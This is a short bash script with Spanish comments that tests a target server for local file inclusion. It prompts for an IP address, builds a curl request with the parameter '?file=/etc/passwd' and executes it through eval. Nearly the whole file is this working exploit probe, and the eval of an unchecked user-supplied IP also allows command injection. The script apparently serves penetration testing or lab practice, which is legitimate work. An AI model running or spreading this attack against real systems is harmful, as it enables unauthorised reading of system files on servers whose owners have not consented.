#!/bin/bash

echo -e "\n\033[1;37m_________________________________________________________\033[0m\n"




# 1 = Local File Inclusion vulnerability


# Solicitar entrada del usuario para la prueba de inclusión de archivo
read -p "Test file inclusion? s/N: " inclusion_test

# Verificar si el usuario ingresó 's' o 'S' para realizar la prueba de inclusión de archivo
if [[ $inclusion_test == "s" || $inclusion_test == "S" ]]; then
    # Solicitar entrada del usuario para la dirección IP del objetivo
    read -p "Ip? " target_IP
    
    # Construir el comando Curl con la dirección IP proporcionada y la ruta de archivo /etc/passwd
    curl_command="curl \"http://${target_IP}/?file=/etc/passwd\""
    
    # Mostrar el comando que se ejecutará
    echo -e "\n\033[1;33m_________________________________________________________\033[0m\n"
    echo "Comando a ejecutar: "
    echo "$curl_command"
    echo -e "\n\033[1;33m_________________________________________________________\033[0m\n"
    # Ejecutar la solicitud Curl con la dirección IP proporcionada
    eval $curl_command
else
    echo "No se realizará la prueba de inclusión de archivo."
fi
